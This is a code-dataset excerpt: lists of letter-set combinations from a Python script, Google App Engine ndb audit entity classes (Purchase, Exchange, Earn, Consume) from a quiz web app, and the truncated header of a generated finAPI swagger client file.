'B', 'O', 'I'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'K', 'O', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'K', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'P', 'O', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'P', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'P', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'O', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'A', 'P', 'D', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'O', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'A', 'O', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'D', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'P', 'O', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'O', 'Q', 'I', 'G', 'L'], ['N', 'J', 'E', 'F', 'K', 'B', 'P', 'H', 'M'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'D', 'I'], ['N', 'C', 'E', 'A', 'B', 'H', 'D', 'I', 'G'], ['N', 'C', 'E', 'A', 'B', 'H', 'D', 'I', 'L'], ['N', 'C', 'E', 'A', 'B', 'O', 'Q', 'I', 'L'], ['N', 'C', 'E', 
'K', 'O', 'Q', 'I', 'G', 'L'], ['N', 'K', 'P', 'H', 'O', 'D', 'I', 'G', 'M'], ['N', 'K', 'P', 'H', 'D', 'Q', 'I', 'M', 'L'], ['N', 'K', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'K', 'P', 'O', 'Q', 'I', 'G', 'M', 'L'], ['N', 'K', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'O', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'Q', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'Q'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'G'], ['J', 'C', 'E', 'F', 'K', 'P', 'O', 'G', 'M'], ['J', 'C', 'E', 'F', 'P', 'O', 'Q', 'G', 'M'], ['J', 'C', 'E', 'A', 'P', 'O', 'D', 'Q', 'G'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'M'], ['J', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'G'], ['J', 'F', 'A', 'K', 'B', 'H', 'D', 'Q', 'L'], ['J', 'F', 'A', 'K', 'B', 'H', 'D', 'G', 'L'], ['J', 'F', 'A', 'B', 'P', 'H', 'D', 'Q', 'M'], ['J', 'F', 'A', 'B', 'P', 'H', 'D', 'G', 'M'], ['J', 'F', 'A', 'B', 'P', 'H', 'D', 'M', 'L'], ['J', 'F', 'A', 'B', 'P', 'O', 'Q', 'M', 'L'], ['J', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['J', 'F', 'K', 'P', 'O', 'Q', 'G', 'M', 'L'], ['C', 'E', 'A', 'K', 'B', 'H', 'O', 'D', 'G'], ['C', 'E', 'A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'Q', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'G', 'M'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'I', 'G'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'G', 'M'], ['C', 'F', 'A', 'B', 'H', 'D', 'Q', 'I', 'L'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'M'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'M', 'L'], ['C', 'F', 'A', 'B', 'O', 'Q', 'I', 'M', 'L'], ['C', 'F', 'K', 'O', 'Q', 'I', 'G', 'M', 'L'], ['C', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['C', 'A', 'K', 'B', 'H', 'O', 'D', 'I', 
'G'], ['C', 'A', 'K', 'B', 'H', 'D', 'Q', 'I', 'L'], ['C', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['F', 'A', 'K', 'B', 'H', 'O', 'D', 'G', 'M'], ['F', 'A', 'K', 'B', 'H', 'D', 'Q', 'M', 'L'], ['F', 'A', 'K', 'B', 'H', 'D', 'G', 'M', 'L'], ['F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G', 'M'], ['F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G', 'L'], ['A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G', 'L'], ['K', 'P', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['K', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'P', 'O', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'P', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'P', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'O', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'O', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'A', 'P', 'O', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'D', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'P', 'O', 'Q', 'I', 'G', 'L'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'D', 'I', 'L'], ['N', 'C', 'E', 'A', 'B', 'H', 'O', 'D', 'I', 'G'], ['N', 'C', 'E', 'A', 'B', 'H', 'D', 'Q', 'I', 'L'], ['N', 'C', 'E', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'C', 'E', 'A', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'P', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'Q'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'O', 'Q', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'O', 'D', 'G'], ['J', 'C', 'E', 'F', 'K', 'P', 'O', 'Q', 'G', 'M'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'Q', 'M'], ['J', 'F', 'A', 'K', 
'B', 'P', 'H', 'D', 'G', 'M'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'M', 'L'], ['J', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['J', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'G', 'M'], ['J', 'F', 'A', 'B', 'P', 'H', 'D', 'Q', 'M', 'L'], ['J', 'F', 'A', 'B', 'P', 'H', 'D', 'G', 'M', 'L'], ['J', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G', 'L'], ['C', 'E', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'I', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'G', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'Q', 'I', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'M', 'L'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G', 'M'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'I', 'G', 'M'], ['C', 'F', 'A', 'B', 'H', 'D', 'Q', 'I', 'M', 'L'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'M', 'L'], ['C', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G', 'M'], ['F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G', 'L'], ['F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'O', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'O', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'O', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'O', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'P', 'O', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'A', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'O', 'D', 'I', 'G'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'D', 'Q', 'I', 'L'], ['N', 'C', 'E', 'A', 'K', 
'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'K', 'P', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'M'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'G'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'Q', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'G', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'G', 'M'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'Q', 'M', 'L'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'G', 'M', 'L'], ['J', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G', 'L'], ['J', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'Q', 'G', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'I', 'G', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'Q', 'I', 'M', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'M', 'L'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['C', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'O', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'P', 'O', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'C', 'E', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'Q', 'M'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'G', 'M'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'G', 'M'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'Q', 'G', 'M'], ['J', 'F', 
'A', 'B', 'P', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'O', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'O', 'Q', 'I', 'G', 'M', 'L'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'G', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'Q', 'G', 'M'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'Q', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 
'D', 'Q', 'I', 'G', 'M', 'L']]
#152
currentAltSets2 = [[], ['J'], ['C'], ['E'], ['F'], ['A'], ['B'], ['H'], ['O'], ['D'], ['Q'], ['I'], ['G'], ['L'], ['J', 'E'], ['J', 'F'], ['C', 'E'], ['C', 'A'], ['C', 'O'], ['C', 'Q'], ['C', 'I'], ['C', 'G'], ['E', 'B'], ['F', 'B'], ['A', 'B'], ['A', 'O'], ['A', 'D'], ['A', 'Q'], ['A', 'L'], ['B', 'H'], ['H', 'D'], ['O', 'Q'], ['O', 'I'], ['O', 'G'], ['D', 'Q'], ['D', 'I'], ['D', 'G'], ['D', 'L'], ['Q', 'L'], ['I', 'G'], ['I', 'L'], ['G', 'L'], ['J', 'E', 'F'], ['J', 'F', 'B'], ['C', 'E', 'A'], ['C', 'A', 'B'], ['C', 'A', 'O'], ['C', 'A', 'D'], ['C', 'A', 'Q'], ['C', 'A', 'I'], ['C', 'O', 'Q'], ['C', 'O', 'I'], ['C', 'O', 'G'], ['C', 'I', 'G'], ['C', 'I', 'L'], ['A', 'O', 'Q'], ['A', 'D', 'Q'], ['A', 'D', 'G'], ['A', 'D', 'L'], ['A', 'Q', 'L'], ['O', 'D', 'G'], ['O', 'Q', 'G'], ['O', 'Q', 'L'], ['O', 'I', 'G'], ['D', 'Q', 'L'], ['D', 'I', 'G'], ['D', 'I', 'L'], ['D', 'G', 'L'], ['Q', 'I', 'L'], ['I', 'G', 'L'], ['J', 'E', 'F', 'B'], ['C', 'E', 'A', 'B'], ['C', 'F', 'A', 'B'], ['C', 'A', 'O', 'Q'], ['C', 'A', 'O', 'I'], ['C', 'A', 'D', 'Q'], ['C', 'A', 'D', 'I'], ['C', 'A', 'D', 'G'], ['C', 'A', 'I', 'L'], ['C', 'O', 'Q', 'G'], ['C', 'O', 'I', 'G'], ['C', 'Q', 'I', 'L'], ['C', 'I', 'G', 'L'], ['A', 'B', 'H', 'D'], ['A', 'O', 'D', 'G'], ['A', 'O', 'Q', 'L'], ['A', 'D', 'Q', 'L'], ['A', 'D', 'G', 'L'], ['O', 'D', 'Q', 'G'], ['O', 'D', 'I', 'G'], ['O', 'Q', 'I', 'L'], ['O', 'Q', 'G', 'L'], ['D', 'Q', 'I', 'L'], ['D', 'I', 'G', 'L'], ['C', 'A', 'B', 'H', 'D'], ['C', 'A', 'O', 'D', 'G'], ['C', 'A', 'D', 'I', 'G'], ['C', 'A', 'D', 'I', 'L'], ['C', 'A', 'Q', 'I', 'L'], ['C', 'O', 'Q', 'I', 'L'], ['A', 'O', 'D', 'Q', 'G'], ['O', 'D', 'Q', 'G', 'L'], ['O', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'B'], ['C', 'F', 'A', 'B', 'H', 'D'], ['C', 'A', 'K', 'B', 'H', 'D'], ['C', 'A', 'B', 'H', 'D', 'I'], ['C', 'A', 'B', 'H', 'D', 'G'], ['C', 'A', 'O', 'D', 'Q', 'G'], ['C', 'A', 'O', 'D', 'I', 'G'], ['C', 'A', 'O', 'Q', 'I', 'L'], ['C', 'A', 'D', 'Q', 'I', 'L'], ['C', 'A', 
'D', 'I', 'G', 'L'], ['C', 'O', 'Q', 'I', 'G', 'L'], ['A', 'O', 'D', 'Q', 'G', 'L'], ['O', 'D', 'Q', 'I', 'G', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'D'], ['C', 'F', 'A', 'B', 'H', 'D', 'I'], ['C', 'F', 'A', 'B', 'H', 'D', 'G'], ['C', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'A', 'B', 'H', 'D', 'I', 'G'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G'], ['C', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['C', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'A', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'G'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['C', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 
'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L']]
#46
currentAltSets3 = [[], ['A'], ['C', 'A'], ['A', 'B'], ['A', 'D'], ['C', 'A', 'B'], ['C', 'A', 'D'], ['C', 'F', 'A', 'B'], ['C', 'A', 'D', 'I'], ['C', 'A', 'D', 'G'], ['A', 'B', 'H', 'D'], ['C', 'A', 'B', 'H', 'D'], ['C', 'A', 'D', 'I', 'G'], ['J', 'C', 'E', 'F', 'A', 'B'], ['C', 'F', 'A', 'B', 'H', 'D'], ['C', 'A', 'B', 'H', 'D', 'I'], ['C', 'A', 'B', 'H', 'D', 'G'], ['C', 'A', 'D', 'I', 'G', 'L'], ['C', 'F', 'A', 'B', 'H', 'D', 'I'], ['C', 'F', 'A', 'B', 'H', 'D', 'G'], ['C', 'A', 'B', 'H', 'D', 'I', 'G'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G'], ['C', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'A', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'G'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L']]
eeb338549267d1d6ad4c22937391c27a1e1bf7cc | 1,313 | py | Python | src/entities/audit.py | clayz/crazy-quiz-web | 7601809ad521d95ae251a026f171b9ec6939c55f | ["Apache-2.0"]
from google.appengine.ext import ndb
from entities import BaseEntity


class Purchase(BaseEntity):
    goods_id = ndb.IntegerProperty(required=True)
    version = ndb.StringProperty(required=True)
    date = ndb.DateTimeProperty(required=True)

    @classmethod
    def get_last(cls, user_key):
        # Fetch the single most recent entity; without .get() this
        # returned an unevaluated Query despite the method's name.
        return cls.query(ancestor=user_key).order(-cls.date).get()


class Exchange(BaseEntity):
    goods_id = ndb.IntegerProperty(required=True)
    version = ndb.StringProperty(required=True)
    date = ndb.DateTimeProperty(required=True)

    @classmethod
    def get_last(cls, user_key):
        return cls.query(ancestor=user_key).order(-cls.date).get()


class Earn(BaseEntity):
    type_id = ndb.IntegerProperty(required=True)
    version = ndb.StringProperty(required=True)
    date = ndb.DateTimeProperty(required=True)

    @classmethod
    def get_last(cls, user_key):
        return cls.query(ancestor=user_key).order(-cls.date).get()


class Consume(BaseEntity):
    type_id = ndb.IntegerProperty(required=True)
    album = ndb.IntegerProperty()
    level = ndb.IntegerProperty()
    picture = ndb.IntegerProperty()
    version = ndb.StringProperty(required=True)
    date = ndb.DateTimeProperty(required=True)

    @classmethod
    def get_last(cls, user_key):
        return cls.query(ancestor=user_key).order(-cls.date).get()
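All four audit entities above share the same "most recent entry for a user" lookup. A minimal, framework-free sketch of that access pattern (plain Python dicts stand in for ndb entities; all names here are illustrative, not part of the repo):

```python
from datetime import datetime


def get_last(records, user_key):
    """Return the most recent record belonging to user_key, or None.

    Mirrors the ndb idiom cls.query(ancestor=user_key).order(-cls.date)
    followed by fetching the first result.
    """
    mine = [r for r in records if r["user_key"] == user_key]
    return max(mine, key=lambda r: r["date"]) if mine else None


# Example audit trail: two purchases for user "u1", one for "u2".
records = [
    {"user_key": "u1", "date": datetime(2014, 1, 5), "goods_id": 1},
    {"user_key": "u1", "date": datetime(2014, 3, 9), "goods_id": 2},
    {"user_key": "u2", "date": datetime(2014, 2, 1), "goods_id": 3},
]

print(get_last(records, "u1")["goods_id"])  # most recent purchase for u1
```

Unlike this in-memory version, the Datastore query pushes the ordering to the index, so only one entity is fetched per call.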
eeb63dfcc7b17f5ed0d9d718d65a237159a6ae7d | 24,092 | py | Python | swagger_client/api/mandator_administration_api.py | chbndrhnns/finapi-client | 259beda8b05e912c49d2dc4c3ed71205134e5d8a | ["MIT"] | 2 | 2019-04-15T05:58:21.000Z | 2021-11-15T18:26:37.000Z
# coding: utf-8
"""
finAPI RESTful Services
finAPI RESTful Services # noqa: E501
